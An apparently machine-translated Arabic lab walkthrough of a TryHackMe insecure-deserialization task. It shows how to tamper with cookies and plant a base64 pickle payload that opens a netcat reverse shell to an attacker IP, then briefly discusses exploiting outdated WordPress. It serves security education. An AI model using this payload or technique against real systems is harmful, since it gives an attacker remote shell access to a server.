هجوم أكثر شناعة من مجرد فك تشفير ملفات تعريف الارتباط ، ندخل في التفاصيل الجوهرية.
اقامة
1. أولاً ، قم بتغيير قيمة ملف تعريف الارتباط userType من "admin" إلى "user" والعودة إلى http: // MACHINE_IP / myprofile
2. بعد ذلك ، انقر بزر الماوس الأيسر على عنوان URL الموجود في "Exhange your vim" الموجود في لقطة الشاشة أدناه.
3. بمجرد القيام بذلك ، انقر بزر الماوس الأيسر على عنوان URL الموجود في "تقديم ملاحظاتك!" حيث ستكون مباشرًا إلى صفحة مثل:
. ما الذي يجعل هذا النموذج عرضة للخطر؟
إذا كان على المستخدم إدخال ملاحظاته ، فسيتم تشفير البيانات وإرسالها إلى تطبيق Flask (على سبيل المثال للتخزين داخل قاعدة بيانات). ومع ذلك ، يفترض التطبيق أن أي بيانات مشفرة جديرة بالثقة. لكننا قراصنة. يمكنك الوثوق بنا فقط بقدر ما يمكنك أن تقذف بنا (وهذا قريب من المستحيل على الإنترنت)
على الرغم من أن شرح البرمجة خارج نطاق هذه الغرفة قليلاً ، فمن المهم فهم ما يحدث في المقتطف أدناه:
عندما تزور عنوان URL الخاص بـ "Exchange your vim" ، يتم تشفير ملف تعريف الارتباط وتخزينه في متصفحك - مما يجعله مثاليًا بالنسبة لنا لتعديله! بمجرد زيارة نموذج الملاحظات ، يتم فك تشفير قيمة ملف تعريف الارتباط هذا ثم إلغاء تسلسلها. اه اه. في المقتطف أدناه ، يمكننا أن نرى كيف يتم استرداد ملف تعريف الارتباط ثم إلغاء تسلسله عبر pickle.loads
استغلال
الآن لن أتركك معلقة جافة هنا. أولاً ، نحتاج إلى إعداد مستمع netcat على Kali الخاص بنا. .
نظرًا لأن الكود الذي يتم إلغاء تسلسله يأتي من تنسيق base64 ، فلا يمكننا ببساطة إنتاج غلاف عكسي. يجب علينا تشفير الأوامر الخاصة بنا في base64 بحيث يتم تنفيذ التعليمات البرمجية الضارة. سأفصل الخطوات أدناه مع المواد المتوفرة للقيام بذلك.
بمجرد اكتمال ذلك ، انسخ والصق شفرة المصدر من ملف python هذا (pickelme.py) إلى kali الخاص بك وقم بتعديل كود المصدر لاستبدال "YOUR_TRYHACKME_VPN_IP"
1. قم بإنشاء ملف بيثون للصق فيه ، لقد استخدمت "rce.py" لهذه الأمثلة:
2. الصق الرمز من موقع GitHub ، واستبدل YOUR_TRYHACKME_VPN_IP من صفحة الوصول
3. قم بتنفيذ "rce.py" عبر python3 rce.py
4. لاحظ إخراج الأمر ، سيبدو شيئًا مشابهًا لهذا:
5. انسخ والصق كل شيء بين علامتي الكلام ("البيانات"). في حالتي ، سأقوم بنسخ ولصق:
gASVcgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTEuMy4yIDQ0NDQgPiAvdG1wL2aUhZRSlC4=
قد تبدو كلماتك مختلفة قليلاً ، فقط تأكد من نسخ كل شيء بين علامتي الكلام ''
6. الصق هذا في ملف تعريف الارتباط "encodedPayload" في متصفحك:
7. تأكد من أن مستمع netcat الخاص بنا لا يزال قيد التشغيل:
8. قم بتحديث الصفحة. سيتعطل ، ارجع إلى مستمع netcat الخاص بك:
إذا قمت بتنفيذ الخطوات بشكل صحيح ، سيكون لديك الآن shell البعيد لمثيلك. لا يوجد تصعيد امتياز متضمن ، ابحث عن علامة flag.txt!
من حين لآخر ، قد تجد أن الشركة / الكيان الذي تختبره بالقلم يستخدم برنامجًا به بالفعل ثغرة أمنية موثقة جيدًا.
على سبيل المثال ، لنفترض أن إحدى الشركات لم تقم بتحديث إصدارها من WordPress لبضع سنوات ، وباستخدام أداة مثل wpscan ، تجد أنها الإصدار 4.6. ستكشف بعض الأبحاث السريعة أن WordPress 4.6 عرضة لاستغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) غير المصادق ، والأفضل من ذلك أنه يمكنك العثور على استغلال تم بالفعل على إكسبلويت ديسيبل .
كما ترى ، سيكون هذا مدمرًا للغاية ، لأنه يتطلب القليل جدًا من العمل من جانب المهاجم كما هو الحال في كثير من الأحيان نظرًا لأن الثغرة معروفة بالفعل ، قام شخص آخر باستغلالها. يصبح الموقف أسوأ عندما تدرك أنه من السهل جدًا حدوث ذلك ، إذا فاتت الشركة تحديثًا واحدًا لبرنامج تستخدمه ، فقد تكون عرضة لأي عدد من الهجمات.
ومن ثم ، لماذا صنفت OWASP هذا على أنه 3 (أي مرتفع) على مقياس الانتشار ، فمن السهل جدًا على الشركة أن تفوت تحديثًا لأحد التطبيقات.
تعليقات: (0) إضافة تعليق